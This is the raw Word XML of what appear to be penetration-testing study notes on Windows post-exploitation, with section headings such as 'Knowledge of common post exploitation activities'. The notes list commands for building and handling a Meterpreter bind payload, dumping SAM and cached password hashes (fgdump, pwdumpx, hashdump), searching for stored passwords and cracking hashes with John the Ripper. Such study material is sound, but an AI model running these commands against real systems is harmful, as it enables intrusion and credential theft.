          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/meterpreter/bind_tcp LPORT=4444 X &gt; mf.exe</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A06D7C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A06D7C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/handler PAYLOAD=windows/meterpr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eter/bind_tcp RHOST=&lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D7C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> E</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incognito</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priv</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stdapi</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list_tokens –u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRPr="00BA7C4E" w:rsidRDefault="00A06D7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etc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E5c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of common post exploitation activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>obtain password hashes, both from the local SAM and cached credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D40C7" w:rsidRPr="002D40C7" w:rsidRDefault="00AD5106" w:rsidP="002D40C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Dump Hashes (SAM)</w:t>
      </w:r>
      <w:r w:rsidR="002D40C7" w:rsidRPr="002D40C7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRPr="00B60D81" w:rsidRDefault="00AD5106"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fgdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D40C7" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">–h &lt;target&gt; –o –u &lt;username&gt; -p &lt;password&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D40C7" w:rsidRPr="00B60D81" w:rsidRDefault="002D40C7"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pwdumpx</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00D174FC" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>cl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>p &lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00D174FC" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;username&gt; &lt;password&gt;</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r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Cain.exe</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r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>whoesthere.exe</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whoesthere-alt.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="002D40C7" w:rsidRDefault="002D40C7" w:rsidP="002D40C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRDefault="00AD5106" w:rsidP="002D40C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>meterpr</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="002D40C7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D930D1" w:rsidRPr="002D40C7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002D40C7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">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msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/meterpreter/bind_tcp LPORT=4444 X &gt; mf.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">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msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>&lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;target&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D40C7" w:rsidRPr="002D40C7" w:rsidRDefault="002D40C7" w:rsidP="002D40C7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> priv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D40C7" w:rsidRPr="002D40C7" w:rsidRDefault="002D40C7" w:rsidP="002D40C7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D40C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00D174FC" w:rsidRDefault="00FA3D71" w:rsidP="00D174FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>obtaining</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t xml:space="preserve"> locally-stored clear-text passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Find files with interesting names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>credential</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unattend.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193DE1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00D930D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00D930D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shortcuts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00D930D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP files .rdp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(pre mstsc v6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRDefault="00FA3D71" w:rsidP="00D174FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>crack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t xml:space="preserve"> password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81"/>
    <w:p w:rsidR="00D174FC" w:rsidRPr="00B60D81" w:rsidRDefault="00193DE1" w:rsidP="00B60D81">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cain</w:t>
      </w:r>
      <w:r w:rsidR="00D174FC" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00B60D81" w:rsidRDefault="00D174FC" w:rsidP="00B60D81">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ohn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;password file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D174FC" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> --show &lt;password file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(will be in uppercase for LM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">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john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –-wordlist=&lt;file&gt;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(user specified wordlist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRDefault="00FA3D71" w:rsidP="00D930D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t xml:space="preserve"> patch levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="00B60D81" w:rsidRDefault="00D930D1" w:rsidP="00193DE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="001C3AF0" w:rsidRDefault="00D930D1" w:rsidP="00193DE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MBSA</w:t>
      </w:r>
      <w:r w:rsidR="00B60D81" w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2ACC" w:rsidRPr="001C3AF0" w:rsidRDefault="003670B4" w:rsidP="001C3AF0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mbsacli.exe </w:t>
      </w:r>
      <w:r w:rsidR="001C3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/xmlout </w:t>
      </w:r>
      <w:r w:rsidR="00AC6320" w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/nvc /catalog wsusscn2.cab /nd /unicode</w:t>
      </w:r>
      <w:r w:rsidR="001C3AF0" w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; mssecure.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003670B4" w:rsidRDefault="003670B4" w:rsidP="001C3AF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C3AF0" w:rsidRDefault="007600C9" w:rsidP="001C3AF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAXPAR.VBS script to have nice output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024516A" w:rsidRDefault="0024516A" w:rsidP="001C3AF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
